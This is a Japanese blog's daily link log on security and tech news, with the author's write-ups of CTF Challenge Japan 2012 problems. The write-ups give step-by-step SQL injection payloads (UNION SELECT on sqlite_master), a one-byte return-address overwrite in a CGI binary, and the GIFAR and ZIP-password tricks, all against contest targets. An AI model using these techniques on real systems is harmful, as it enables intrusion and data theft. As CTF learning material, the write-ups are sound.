糸の切れた凧（ a threadless kite ）

The New York Timesは、ネットワークが中国のハッカーらによる攻撃を受け、従業員らのパスワードが盗まれたという独占記事を掲載した。またマルウェアのほとんどを検出しなかったとして、シマンテ

NYT、中国人ハッカーからの「執拗な攻撃」を告白-批判の矛先をシマンテックにも (CNET)

NYT、中国のハッカーからの「執拗な攻撃」を告白--批判の矛先をシマンテックにも

New York Timesが中国からサイバー攻撃を受けたと報道したことを受けて、Wall Street Journalも同様の攻撃を受けたと伝えた。複数の米メディアが狙われたもようだ。

「我々も中国からハッキング攻撃を受けた」とWSJ、被害は明らかにせず (ITmedia)

「我々も中国からハッキング攻撃を受けた」とWSJ、被害は明らかにせず

ＷＳＪ紙もハッカー被害＝中国、米メディアへ侵入拡大 (時事ドットコム)

時事ドットコム

実は大手検索エンジンやSNSなどの方が危険が大きい実態が判明した。個人情報を犠牲にすることも厭わない若者世代が企業のセキュリティ対策に与える影響にもスポットを当てた。

炎上アプリ「全国共有電話帳」が、高木浩光氏と杉浦隆幸氏にソースコードでケンカを売る

お探しのページは見つかりませんでした。 | かつてスマホアプリをレビューしていたサイト跡地

お探しのページは見つかりませんでした。

http://app-review.jp

「アダルトサイトよりネット広告が危険」―Cisco報告書 (ITmedia エンタープライズ)

「アダルトサイトよりネット広告が危険」――Cisco報告書

かつては日本でも「検索エンジン」を自前で開発しようという機運があったものの、今ではほとんど無くなってしまった。検索エンジンを持たないことで、どんな未来が待ち受けているのだろうか。

“迷探偵”ハギーのテクノロジー裏話：国産検索エンジン開発が頓挫した先にあるもの

国産検索エンジン開発が頓挫した先にあるもの

1. SPDYブーム到来おかげさまで、ここ数日 SPDY が私の周りで非常にブームになってきています。前回案内したSPDY＆WS勉強会は既に200名以上の申し込みがあり、今ではSPDYネタでブログ

GmailがハマったSPDYの落とし穴 (ぼちぼち日記)

GmailがハマったSPDYの落とし穴 - ぼちぼち日記

レシートの写真を撮影すると、購入品目や価格を自動で読み取って記録できる家計簿アプリ「ReceReco」が公開。写真やメモを残すこともでき、ライフログとしても使えるとしている。

レシート写真を撮るだけライフログにもなる家計簿アプリ「ReceReco」 (ITmedia)

レシート写真を撮るだけ　ライフログにもなる家計簿アプリ「ReceReco」

海外のSFオンラインゲーム「Eve Online」でのできごと。

「あっ……」クリックミスが原因で大宇宙戦争に発展してしまった話 (ねとらぼ)

「あっ……」クリックミスが原因で大宇宙戦争に発展してしまった話

http://nlab.itmedia.co.jp

「社内公用語はジャパスクリプト」の衝撃【ルポ迫真】 (＠IT自分戦略研究所)

「社内公用語はジャパスクリプト」の衝撃【ルポ迫真】

「どれぐらい違うのかっていったら、ジャバ語とジャパスクリプト語ぐらい違うよ」「Hahaha!」と笑い合える日が、人類にとっての本当の夜明けです。

http://jibun.atmarkit.co.jp

最新版「生涯給料」トップ1000社 (東洋経済オンライン)

野村総研、社員によるワイセツ被害女性を“逆に”訴えた恫喝訴訟で実質上の全面敗訴

日本を代表するシンクタンク・株式会社野村総合研究所（以下、野村総研）の幹部が、2007年12月に取引先の女性営業担当者に強制わいせつ行為を働いたとされる、いわゆ...

http://biz-journal.jp

死ぬまでに行ってみたい!! アニメの舞台ランキング 1位は「スウェーデンのストックホルム」

U-NOTE[ユーノート] - 仕事を楽しく、毎日をかっこ良く。 -

U-NOTEは若手ビジネスマンのための、仕事を楽しくするサイトです。ビジネス・メンズファッション・ライフスタイル・本・インタビューなど、多彩なジャンルの情報を提供しています。

http://irorio.jp

衝撃の発覚！５ドル紙幣に隠されていた謎のホットケーキ！ on Twitpic

衝撃の発覚！５ドル紙幣に隠されていた謎のホットケーキ！

http://twitpic.com

大人のちくわ消しゴム1: ロマンてなんだ！

大人のちくわ消しゴム1 - ロマンてなんだ！

決してメインなんかにはなれないけれど、ちょっとダサくて愛嬌があって。そん...

http://bananahammer.cocolog-nifty.com

男子がまたたく間に恋に落ちる魔法!? 彼の○○をクルクルするだけ (グリッティ)

http://www.glitty.jp/2013/01/027301130131koi.html

http://www.glitty.jp

2013/02/02(土)土曜日ー。（やばいネット散策してるヒマがない、、）

[雑談] いろいろ。

全国大会の実施について (CTF チャレンジジャパン 2012)

http://ctf-challenge.jp/final.html

http://ctf-challenge.jp

キレる人は、なぜキレるのか職場の摩訶不思議10篇 (プレジデント Online)

キレる人は、なぜキレるのか

相手は、大声で怒鳴れば思いが伝わってあなたが動き、自分にとって気に食わない状況が好転すると考えています。

http://president.jp

会社の束縛から開放される6つの方法～本『自由な働き方をつくる』を読んで

篌�腓障��膰��障��6��ゃ��号��宴��鴻��ゃ��茯㏍�� - ��ゃ��㏍��Ko's Style

篁�篋��紫��羇祉��ｃ��障��号��激��

http://kosstyle.blog16.fc2.com

2013/02/03(日)日曜日ー。（今夜はぐっすり眠ろう。。）

[雑談] いろいろ。

ホワイトハッカー育成へコンテスト (NHKニュース)

エラー｜NHK NEWS WEB

　国内のセキュリティー技術者が知識と技術を競う競技会「CTFチャレンジジャパン 2012」の決勝大会が、秋葉原のUDXギャラリーネクストで開かれた。12年11月から全国4か所で開かれた地方予選を勝ち抜

メガ電波中級編～キン肉マン「Go Fight！」ご主人様？8bitは如何ですか？mix

Vol.4　中級編 | MEGA電波

http://denpa100.com

[CTF] CTFチャレンジジャパン2012 Write-Up: サービスアタック100問題文

textile不正行為をしたユーザーを突き止めろ！
http://target:8080/cgi-bin/ranking.cgi
http://target

試したことふつうにブラウザでアクセスhttp://target:8080/cgi-bin/ranking.cgi → http://target:8080/cgi-bin/ranking.cgi?u=guest に転送![](/image/web100.png)u=guestの後ろに「'(シングルクォーテーション)」を付けてみる。

textileError unrecognized token: "'guest'';"

「u=guest' and 'a'='a」にしてみる。 → 正常と同じ画面が表示された。「u=guest' and 'a'='b」にしてみる。→ ランキングの「guest」と表示される部分が「unknown」に変わった。→ SQLインジェクションかなと当たりをつける。「u=guest' order by 1 --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' order by 2 --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' order by 3 --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' order by 4 --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' order by 5 --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' order by 6 --」にしてみる。→ エラー「Error 1st ORDER BY term out of range - should be between 1 and 5」が表示された。（ご丁寧にカラム数が表示されてた。orz）「u=guest' union select NULL,NULL,NULL,NULL,NULL --」にしてみる。→ 正常と同じ画面が表示された。「u=guest' union select NULL,NULL,NULL,NULL,NULL from pg_tables --」にしてみる。→ エラー「Error no such table: pg_tables」が表示された。→ 色んなデータベースのシステムテーブルの名前を試す。→ 「sqlite_master」だとエラーにならない！ → SQLiteだ。→ システムテーブル「sqlite_master」の「name」カラムを表示し、データが格納されているテーブル名とカラム名を得る。「CREATE TABLE ranking(id integer, name text, point integer, reipaddr text, ua text)」「u=guest' and 1=2 union select NULL,name,reipaddr,NULL,NULL from ranking where name='hAckerZ' --」を実行すると、答えのIPアドレスが表示される。![](/image/web100ans.png)

2013/02/04(月)月曜日ー。（おまけで載せてくれた感じでも嬉しいｗ）

[雑談] いろいろ。

初代王者はネットエージェントのチーム、CTFチャレンジジャパンが初の決勝大会 (ITpro)

初代王者はネットエージェントの技術者チーム、CTFチャレンジジャパンが初の決勝大会

「正義のハッカー」全国大会、アキバで腕試し (YOMIURI ONLINE/読売新聞)

ハッカー集団があなたの会社を狙う：最新サイバー攻撃に備える (ITpro)

ハッカー集団があなたの会社を狙う

on Hacker News and reddit Previously I wrote how you can use XSS Auditor for Great Good(report to

Egor Homakov: Hacking With XSS Auditor

Hacking With XSS Auditor

http://homakov.blogspot.jp

使い回しＩＤが標的に…流出情報で不正アクセス (YOMIURI ONLINE/読売新聞)

Twitterは米国時間2月1日、ユーザーデータへの一連のハッキング攻撃を検知し、攻撃者が約25万人分のユーザー情報にアクセスした可能性があることを明らかにした。

Twitterにセキュリティ攻撃--ユーザー25万人に影響か (CNET Japan)

Twitterにセキュリティ攻撃--ユーザー25万人に影響か

中国「全くのでたらめだ」米サイバー攻撃にちらつく影 (朝日新聞デジタル)

http://www.asahi.com/international/update/0202/TKY201302020372.html

http://www.asahi.com

NYT、中国人ハッカーからの「執拗な攻撃」を告白-批判の矛先をシマンテックにも (CNET)

NYT、中国のハッカーからの「執拗な攻撃」を告白--批判の矛先をシマンテックにも

Oracleは、脆弱性を突く攻撃が発生したことから定例パッチを前倒しで公開。AppleもMac OS X v10.6.8向けのJavaアップデートを公開した。

Java更新版「Java 7 Update 13」、前倒しでリリース　攻撃の発生受け (ITmedia)

Java更新版「Java 7 Update 13」、前倒しでリリース　攻撃の発生受け

ライター・遠竹智寿子氏がドイツ出張に行った際、なんと海外のパケット通信料として76万円の請求があった。au iPhoneユーザーが海外渡航前に必読すべき顛末レポート！

au iPhoneの海外パケット通信で請求76万円に陥ったワケ (ASCII)

au iPhoneの海外パケット通信で請求76万円に陥ったワケ - 週刊アスキー

http://weekly.ascii.jp

ＡＴＭにスキミング装置　首都圏６カ所、１３０口座被害 (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302010497.html

2月2日、3日の2日間に渡り、東京・秋葉原で「CTFチャレンジジャパン 2012」が開催された。

[CTF] CTFチャレンジジャパン2012 Write-Up: フォレンジック100 「パッケージのタイトルは何？」問題文

textileパッケージのタイトルは何？壊れた画像ファイルを復元し、このプロダクトのタイトルを推測せよ。

試したこと問題が入っているZIPを開くと、壊れた画像ファイルが入っている。![](/image/CTFjpn/whatisit.gif)バイナリエディタで開いてみる。![](/image/CTFjpn/whatisit2.png)ヘッダの「iHDR」を「IHDR」に書き換えて保存すると、バーコードが表示された。![](/image/CTFjpn/whatisit3.gif)なんか右側のほうが足りない気がする。線を足すなど色々試行錯誤したがうまくいかない。目視で読んでみようと試みたが、途中で挫折。```textile第106回　これがバーコードの意味だ！（１）

http://www.uraken.net/zatsugaku/zatsugaku_106.html

第106回　これがバーコードの意味だ！（１）

http://www.uraken.net

```最後にダメ元で、真ん中の2本の線から左側をコピーして、画像を左右反転して、2本線を基準に並べて、右側にはみ出た部分を画像に足してみたところ、iPhoneに入れたバーコード読み取りソフトが読み取ってくれた。（←たぶん正しい解き方ではないｗ）![](/image/CTFjpn/whatisit5.png)答えは、「Hackers」。

2013/02/05(火)火曜日ー。（飲み過ぎ食べ過ぎでさらに太りそう。）

[CTF] CTFチャレンジジャパン2012 Write-Up: 暗号解読100 「読みにくい画像の文字」ol li{margin-left:15px;padding-bottom:5px}問題文

textile読みにくい画像の文字Find the key

試したこと問題のZIPファイルを開くと、以下の画像が入ってました。![](/image/CTFjpn/find-key.jpg)目を細めながら見たり、頭をシェイクしながら見たり、画像を小さくして遠目から見たりしてみたけど、行頭の「Find the key」以外は目視では見えなさそう。どうやら、以下の部分が画像を解く鍵らしい。（けど、何だっけこれ？状態。）![](/image/CTFjpn/find-key2.png)正攻法は諦めて、フォトショで開いてみた。色んな「効果」をかけて、コントラストなどを調整してみると・・・うっすらと、何かXMLのようなものが見えるような、見えないような。![](/image/CTFjpn/find-key3.jpg)その後、試行錯誤するうちに、[フィルター]-[ノイズ]-[明るさの中間値] を使うことで、以下の画像までたどり着きました。見える！見えるぞ！！![](/image/CTFjpn/find-key4.png)何かURLが見えたので、開いてみると* SmartDeblur

https://github.com/Y-Vladimir/SmartDeblur/downloads

https://github.com

という画像加工ツールのURLでした。せっかくなので、このツールで画像を加工してみたら、以下の画像ができました。（もっとパラメータの調整のしようがありそうでしたが。）![](/image/CTFjpn/find-key5.png)画像中の、<key>abdfg12345678xyzAW</key> の部分が答え。

2013/02/06(水)水曜日ー。（大雪・・・ではないよね。）

[雑談] いろいろ。

「CTFの楽しさを広く一般にも」大人のCTF大会、「CTFチャレンジジャパン」開催 (＠IT)

大人のCTF大会、「CTFチャレンジジャパン」開催

ファイルをバイナリエディタで開くと、ELFファイルでFreeBSD用っぽいので環境を用意してとりあえず走らせます。パスワードを入力する必要があるようです。 stringsコマンドで文字

CTF Challenge Japan(Final) Write Ups - Binary 100 (とある脆弱性のシェルコード)

CTF Challenge Japan(Final) Write Ups - Binary 100

http://magazine.cybozulive.com

はせがわようすけ、宮本久仁男がSECCON CTFにかける思い (サイボウズLiveマガジン)

http://magazine.cybozulive.com/2013/02/seccon_ctf.html

CROSS 2013レポート：エンジニアも避けては通れない「安全な利用規約」の作り方 (＠IT)

エンジニアも避けては通れない「安全な利用規約」の作り方

1月18日、「エンジニアサポートCROSS 2013」が開催された。その中から、NHN Japanのmala氏による「体系的に学ぶ安全な利用規約の作り方」をレポートする。

【なりすましウイルス】 “最後のメール”から１カ月嘘、ミス、防犯カメラ…狭まる包囲網

http://sankei.jp.msn.com/affairs/news/130206/crm13020614240012-n1.htm

アノニマスが銀行幹部4000人の個人情報を流出させる。政府のWebサイトから (GIZMODO)

アノニマスが銀行幹部4000人の個人情報を流出させる。政府のWebサイトから

米ＦＲＢがハッカー被害＝銀行幹部の情報流出か－メディア報道 (時事ドットコム)

時事ドットコム

QolyがFacebook経由のサイバー攻撃を受けた件について (qoly.jp)

404 Not Found

http://qoly.jp

Facebookで友達を切られると、4割の人間がソイツとの接触を全力回避すると判明 (IRORIO)

U-NOTE[ユーノート] - 仕事を楽しく、毎日をかっこ良く。 -

http://irorio.jp

首都圏で雪ラッシュ時に間引き運転、大混雑の駅も (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302060049.html

先月、「２年付き合った彼女と別れたのでGoogleAdwordsで彼女を募集してみる」「GoogleAdwordsで彼女を募集したら可愛いお姉さんと知り合えた話」というエントリーを書いたところ、

GoogleAdwordsで彼女を募集したら可愛いお姉さんと知り合えたんですが、このたび...

GoogleAdwordsで彼女を募集したら可愛いお姉さんと知り合えたんですが、このたび... - razokulover publog

http://razokulover.hateblo.jp

[CTF] CTFチャレンジジャパン2012 Write-Up: サービスアタック200 「Emailのログを盗み出せ！」ol li{margin-left:15px;padding-bottom:5px}pre{white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-o-pre-wrap;white-space:-pre-wrap;word-wrap:break-word;}問題文

textileサーバ管理者のA君は、どこからでもSMTPのログを確認したかったため、一見なんの変哲もないプログラムtest.cgiにEmailのログを出力する仕組みを実装した。たまたまtest.cgiを手に入れたB君はあなたにそのプログラムの解析を依頼してきた。test.cgiを解析し、サーバにあるEmailのログを得よ。

試したこと問題のZIPファイルを開くと、test.cgiが入っていた。・・・バイナリやんけ！(-_-;)![](/image/CTFjpn/testcgi.png)まず、password.txtにアクセスできるかどうかを確認。/cgi-bin/password.txtは存在するようだが、/cgi-bin/以下なので普通には表示できない。ここから数十分、どうにかしてpassword.txtを表示する方法がないか試行錯誤。次に、REMOTE_ADDR 127.0.0.1という文字列に注目。試しに手元のバイナリで確認すると、確かにローカルからのアクセスだとパスワード無しでメールログが表示される。ローカルからtest.cgiへアクセスする方法がないかここから数時間、試行錯誤。サービスアタック100のCGIからアクセス出来るんじゃないか？（SQLインジェクション経由でhttp://127.0.0.1/cgi-bin/test.cgiを読み込める？）とか、トップページ以下のコンテンツのどこかに隠れてるんじゃないか？とか、何か既知の脆弱性があるWebアプリ経由か？と思ってniktoかけてみたりとか、CONNECTメソッド経由やWebプロキシ経由でアクセスするんじゃないか？とか、ダメ元でフルポートでポートスキャンかけてみたりとかも。アイディアが尽き果てて、仕方がなく、慣れないIDA Pro Freeでバイナリを覗いてみた。メールログを表示する関数に飛ぶのは、やはりREMOTE_ADDRが127.0.0.1の時と、QUERY_STRINGとpassword.txtとを比較しているところからだけっぽい。しかもQUERY_STRINGについては、文字数が16文字以下の時しか処理を進めないようになっているっぽく、これではバッファオーバーフローも起こりそうにない。(?!)ただ、色々と試していくうちに、QUERY_STRINGが16文字の時に気になる挙動が：http://target:8080/cgi-bin/test.cgi?0000000000000000 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000001 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000002 → 正常http://target:8080/cgi-bin/test.cgi?0000000000000003 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000004 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000005 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000006 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000007 → 正常http://target:8080/cgi-bin/test.cgi?0000000000000008 → エラーhttp://target:8080/cgi-bin/test.cgi?0000000000000009 → 正常何だか良く分からないが16文字でブルートフォースしたら答えが出るんじゃないか？と思いつき、Perlでプログラムを書き始めたが・・・指定する数字によっては無限ループに入ってしまい、ブルートフォースがかけにくい。alarmを使ってプログラムが終わらない時は強制的に次に進むように試行錯誤。そうこうしているうちに、運営側からヒント。え、gdb使うの？！（Web問題なのに、、）隣に座っていたこういうのが得意なチームメイトに助けを求めたら、5分もしないうちに解いてくれました。オレの十数時間を返せ！！解き方は見せてくれなかったので、CTF終了後に自分で勉強して解いてみた。QUERY_STRINGにAAAABBBBCCCCDDDDを設定して、gdb内でtest.cgiを実行すると、0x08048644でSegmentation faultで異常終了。![](/image/CTFjpn/testcgi2.png)ESPの付近を見ると、AAAABBBBCCCCDDDDが0x41～0x44で入っている部分に重なって、0x44 0x86 0x04 0x08という文字列があり、これがEIP（0x08048644）らしい。QUERY_STRINGの最後の1バイトがアドレスを上書きしているということかしら。IDA Pro Freeで覗くと、答えを表示するサブルーチンのアドレスは、0x08048651。![](/image/CTFjpn/testcgi3.png)QUERY_STRINGの最後の1文字を「D」(0x44)から0x51を意味する「Q」に変えると、答えのメールログが表示された。（以下の画像はローカルで実行。実環境で実行するとフラグが表示された。）![](/image/CTFjpn/testcgi4.png)

2013/02/07(木)木曜日ー。（きゃりーぱみゅぱみゅはカレーパンの名前？）

[雑談] いろいろ。

CTF Challenge Japan(Final) Write Ups - Service Attack 200 (shellc0des)

CTF Challenge Japan(Final) Write Ups - Service Attack 200

以下が問題文で、実際には特定のサーバに設けられているtest.cgiから解答を得てくることになる。 [タイトル] Email のログを盗み出せ！ [問題] サーバ管理者のA君は、どこからで

米連邦準備理事会（FRB）は、「Webサイトベンダー製品の一時的な脆弱性」が悪用され、情報が流出したことを認めた。

FRBにサイバー攻撃、米銀行の幹部情報が流出 (ITmedia ニュース)

FRBにサイバー攻撃、米銀行の幹部情報が流出

会社を辞めたり解雇されたりした後も、大半が元勤務先の社外秘情報を持ち続けていることが分かった。

「元勤務先の情報持ち出しに罪悪感なし、転職先で利用も」―Symantec調査 (ITmedia)

「元勤務先の情報持ち出しに罪悪感なし、転職先で利用も」――Symantec調査

Tech総研『技術豆知識』カテゴリの『開発者を悩ませるiframe内表示Webアプリ問題とは？』。フレーム内に小さなブラウザのようにWebページを表示してくれる「iframe」。特別な技術は必要ないの

開発者を悩ませるiframe内表示Webアプリ問題とは？ (Tech総研)

開発者を悩ませるiframe内表示Webアプリ問題とは？｜【Tech総研】

http://next.rikunabi.com

GoogleのJSON(モドキ)の先頭にwhile(1); がつく理由 (葉っぱ日記)

GoogleのJSON(モドキ)の先頭にwhile(1); がつく理由 - 葉っぱ日記

なぜGoogleはJSONの先頭に while(1); をつけるのか #JavaScript #HTML #Ajax #StackOverflow - Qiita これはクロスサイト・リクエスト・フォ

Googleドライブに公開設定のフォルダを作り、Webページの構成要素をアップロードすることで、Googleドライブ上でWebページを公開できるようになった。

GoogleドライブにWebホスティング機能が追加 (ITmedia ニュース)

GoogleドライブにWebホスティング機能が追加

大手メディアを狙ったサイバー攻撃が相次いでいる米国で、今度はエネルギー省のコンピュータが不正侵入の被害に遭った。

米エネルギー省にサイバー攻撃、職員数百人の個人情報流出 (ITmedia ニュース)

米エネルギー省にサイバー攻撃、職員数百人の個人情報流出

TechCrunch | Reporting on the business of technology, startups, venture capital funding, and Silicon

政府の言う「あなたのデータは安全」は真実か？ (TechCrunch)

TechCrunch | Startup and Technology News

http://jp.techcrunch.com

スマホの中に自分だけの水族館が作れるサービスをサンシャイン水族館で (GIZMODO)

スマホの中に自分だけの水族館が作れるサービスをサンシャイン水族館でやるってよ

http://business.nikkeibp.co.jp

地下鉄乗車中に首都直下地震が発生したら？ (日経ビジネスオンライン)

お探しのページが見つかりませんでした：日経ビジネス電子版

原口一博「Google Earthを見ればどこに艦船があるかわかる」発言がネットで話題に

404 Not Found | このページは存在しないか、すでに削除されています

中国大気汚染、日本の空は大丈夫？識者から懸念の声も (朝日新聞デジタル)

http://digital.asahi.com/articles/TKY201302020376.html

抗生物質で治すことができない病気（軽い病気も含めて）が増加中で、世界中で警告が発せられている。病原菌の抗生物質に対する抵抗力がどんどん強くなっているせいで、わたしたちはペニシリン以前の時代に戻ろうとし

もし細菌が抗生物質との戦いに勝利したら (WIRED.jp)

もし細菌が抗生物質との戦いに勝利したら

http://wired.jp

Ｂ７８７、機体名書き換えで運航再開へ国交省 (虚構新聞社)

Ｂ７８７、機体名書き換えで運航再開へ　国交省

http://kyoko-np.net

あるレストランのレシートに記載された「行儀の良い子ども割引」が大反響を呼ぶ

あるレストランのレシートに記載された「行儀の良い子ども割引」が大反響を呼ぶ

電車内でのベビーカー利用に関し、なにかと議論が繰り広げられている昨今。ロケットニュース24でも以前、子連れで飛行機に乗った親の気遣いについてお伝えしたところ賛否 …

ありそうでなかったもの。その一つが、新宿の巨大な地下の道の全体が見渡せる地図だ。それを1人で作り上げた美大生がいる。名前は志田成美さん（東京藝術大学大学院美術研究科）。修了制作展で巨大な手作り地図「新

美大生が1人で作った新宿の巨大地下地図「新宿地下考現学」 (Excite Bit コネタ)

美大生が1人で作った新宿の巨大地下地図「新宿地下考現学」 - エキサイトニュース

http://www.excite.co.jp

「なぜ、お城型のラブホテルは消えたのか？」目からウロコの“エッチ空間”の歴史学

「なぜ、お城型のラブホテルは消えたのか？」目からウロコの“エッチ空間”の歴史学

幼い頃、街中にそびえ立つお城を見て、不思議に思った読者の方も多いのではないだろうか。年齢を重ねるにつれ、あのお城がラブホテルだったことを知り、その後、自らも利用するようになる。今ではすっかり、あのお城

http://www.cyzo.com

バレンタインにチョコを配る職場は、業績がいい？ (Business Media 誠)

バレンタインにチョコを配る職場は、業績がいい？

バレンタインにチョコレートを職場で配る習慣がある会社はどのくらいあるのだろうか。ベストチーム・オブ・ザ・イヤー実行委員会の調査によると、56％が「ある」と回答した。

「嫁欲しい」「彼女欲しい」というのは、具体的な成果物設定がないままゴールだけを規定しているという、プロジェクトマネジメントとしては失敗プロジェクトのモデルケースみたいな欲求なので、「○○さんを彼女にし

「彼女欲しい」という欲求はプロジェクトとして考えると破綻している (不倒城)

「彼女欲しい」という欲求はプロジェクトとして考えると破綻している: 不倒城

http://mubou.seesaa.net

[CTF] CTFチャレンジジャパン2012 Write-Up: 暗号解読200 「スパイからのメール」ol li{margin-left:15px;padding-bottom:5px}pre{white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-o-pre-wrap;white-space:-pre-wrap;word-wrap:break-word;}問題文

textile捜査日誌2008 年10 月10 日私が数年追い続けているスパイ（コードネーム：X27）は、IT 技術などを駆使して世界中から追われている謎の人物だ。以前、X27 が公衆無線LAN を使ったときに、恋人のジファー宛に出したメールは手に入れていたが、あまり重要な情報は手に入らなかった。しかし、ここ東京に来て、謎を解く手がかりを得ることができた。これまで幾度となく逃げられてきたが、これでようやく奴に手が届くはずだ。X27 は恋人に何を伝えたかったのか。それさえわかれば、X27 を捕まえる大きな手がかりを得られるに違いない。このメールの分析を君にも協力して欲しい。そして、何を伝えたかったのかを調べて欲しい。

試したこと問題のZIPファイルを開くと、Happy_Birthday!.txt というテキストファイルが入っていた。![](/image/CTFjpn/for_lover2.png)base64の添付ファイル部分をデコードすると、GIFファイルが現れた。![](/image/CTFjpn/for_lover.gif)「？」と思いながら、念のため、GIFファイルをバイナリエディタで覗いてみると、先頭部分はGIFファイルだったが、後半にZIPファイルが連結されていた。それで* GIFAR

GIFを隠れ蓑に悪性Javaを勝手に実行

　クライアント・パソコンを狙った攻撃が巧妙さを増し，対策はますます難しくなってきている。中でもJavaScriptやFlashのぜい弱性を悪用した，スクリプトを使う攻撃は極めて厄介である。スクリプトは

外務省が2013年2月5日付で発表した同省のネットワークから外部への情報流出事案について、その後のメディアの報道情報も含めて概要をまとめます。概要 1月28日に内閣官房情報セキュリティセンターから情

なのね。いわゆる目grep問題だったようだ。![](/image/CTFjpn/for_lover3.png)バイナリファイルからZIP部分を切り出して、喜び勇んで展開しようとすると・・・パスワードを求められた。パスワード付きZIPだったのね、、先ほどの楽譜がヒントに違いないと、楽譜の読めるチームメイトに英語・ドイツ語などの音名表記になおしてもらって、試したところ、ZIPのパスワードは「GGAGCB」だった。（英大文字で6文字だろうと想像がついたので、楽譜が読めなくても、普通にブルートフォースしても2分くらいで破れそうですね。）パスワード付きZIPを開くと、答えが書いてあるテキストが出現。

textile私の恋人ジファーへ私は監視されている身で、あなたに本当のことを伝えることができませんでした。普通の暗号化したメールを送ると、それだけで怪しまれてしまいます。でも、きっとジファー（GIFAR）なら、楽譜の画像ファイルに隠されたファイルに気が付くと思っていました。どうしてもあなたに本当の名前を伝えておきたかった。私の本当の名前は「MariaMagdalenaDietrich」です。この名前で次への扉が開かれることでしょう。あなたの X27 より

ということで、答えは、「MariaMagdalenaDietrich」。

2013/02/08(金)金曜日ー。（OOMKillerとオオアリクイはどちらが強いんだろう？）

[雑談] いろいろ。

外務省の2013年2月の情報流出事案をまとめてみた。 (piyolog)

外務省の2013年2月の情報流出事案をまとめてみた。 - piyolog

http://news.searchina.ne.jp

サイバー攻撃の約半数、Ｊａｖａの脆弱性をターゲットに (サーチナ)

http://news.searchina.ne.jp/disp.cgi?y=2013&d=0207&f=it_0207_030.shtml

IT検証ラボ: 遠隔操作ウイルスの動作を調査、感染したら隠れてしまう (ITpro)

遠隔操作ウイルスの動作を調査、感染したら隠れてしまう

　最近話題の遠隔操作ウイルスとはどんなものなのか。代表的な「BKDR_POISON」を実際に感染させて、どのような攻撃が可能になってしまうのか、感染後のウイルスはどんな動きをするのかを詳細に調べた。

　写真やメールなどプライベートな情報が詰まったスマホは、落としてしまった際のリスクが甚大だ。不正なアプリやウェブサイトの脅威からだけでなく、端末そのものを守る必要もある。

週末スペシャル: スマホの盗難・紛失対策、“まさかの落とし穴”に注意 (ITpro)

スマホの盗難・紛失対策、“まさかの落とし穴”に注意

http://japan.internet.com

SSL、TLS の脆弱性を突く「Lucky Thirteen」 HTTPSサイトからの不正取得が可能に

http://japan.internet.com/webtech/20130207/2.html

ペニオク問題、ほしのさんら立件見送りへ「詳細知らず」軽犯罪法も時効 (ITmedia)

IT総合情報ポータル「ITmedia」Home

Is it Spam or Is it Malware?, Author: Kevin Shortt

Is it Spam or Is it Malware?

https://isc.sans.edu/diary/Is+it+Spam+or+Is+it+Malware+/15121

https://isc.sans.edu

/ * Intel Network Card (82574L) Packet of Death (ISC Diary)

https://isc.sans.edu/diary/Intel+Network+Card+82574L+Packet+of+Death/15109

Intel Network Card (82574L) Packet of Death, Author: Johannes Ullrich

https://isc.sans.edu

ソーシャルハッキングに注意 (さまざまなめりっと)

ソーシャルハッキングに注意 - さまざまなめりっと

「Google Earthかなんかでみればわかりますよ、どこに日本の艦船がいたかどうか」──原口元総務相の国会発言が話題になった。

日本の艦船の位置は「Google Earthで見れば分かる」？原口元総務相の発言 (ITmedia)

日本の艦船の位置は「Google Earthで見れば分かる」？　原口元総務相の発言

http://news.itmedia.co.jp

Google EarthじゃなくてGoogle Mapsで世界の軍艦の位置を確認する方法 (ITmedia)

http://news.itmedia.co.jp/20130208/002667

「Gmailにだまされるな」、Microsoftがネガティブキャンペーン開始 (ITpro)

「Gmailにだまされるな」、Microsoftがネガティブキャンペーン開始

　米Microsoftは現地時間2013年2月6日、米GoogleのWebメールサービスを糾弾するキャンペーン「Don't Get Scroogled by Gmail」を開始した。Googleのプラ

ロケットニュース24は、あまり新しくないニュースを早く伝えたいという気持ちだけは負けていないサイトです。海外のニュースや、変なニュース、おもしろいニュースやネッ …

第9回新卒社員の「勘違い」～外注化の増加は止まらない～ (亜紀書房ZERO事業部)

404 NOT FOUND | zero-beauty

http://www.akizero.jp

仕事もできる猫カフェが癒されすぎる件 / 在籍するのは被災地の猫たち (rocketnews24)

http://rocketnews24.com/2013/02/08/291521/

2013/02/09(土)土曜日ー。（スーパーも、ネットスーパーも不便な地域で困る。。）

[CTF] CTFチャレンジジャパン2012 Write-Up: サービスアタック300 「Make your bet!」ol li{margin-left:15px;padding-bottom:5px}pre{white-space:pre-wrap;white-space:-moz-pre-wrap;white-space:-o-pre-wrap;white-space:-pre-wrap;word-wrap:break-word;}問題文

textileConfidentiality statement: we keep id, name and rate. Closest rate for today wins. Yesterday winning rate: c8ce85ad1ea2c3650061769f4f101096. Yesterday winner: Flag You are logged in as guest.

試したことこの問題は、正直、**全く意味が分からなかった。。** あまりにも「？」な感じだったので、まともにログを取っていなくてWriteUp書く材料がナッシング。とりあえず、画面に、番号とユーザ名の一覧（cheater、Flag、guest）があって、自分のrateを入れるテキストボックスがある感じ。一覧は、通常は番号あるいはユーザ名で並べ替えが出来るようになっていて、ただ、問題文のヒントを元に、sort=id や sort=name だった QUERY_STRING を sort=rate に変更すると、恐らく rate順に並び替えができたのであろう感じになっていた。（rateは画面には表示されない。）rate順に並び替えた状態で、rate入力欄に「0」を入れると、自分が一番上に表示された。また、「f」を入れると自分の順番が一番下に変わった。「5」を入れると真ん中になった。これらの反応から、恐らく、2位に僅差を付けて1位になる値を探すか、あるいは、3位に僅差をつけて2位になる値を探せば良いのではないか？と予想。0 1 2 3 4 と入れていって、0～3だと自分が1位、4だと2位。なので、最初が 3？30 31 32 と入れていって、30～31だと自分が1位、32だと2位。なので、31？・・・31337 が得られた。だいぶ桁数が少ない気がしたものの、念のため答えとして送信。→ 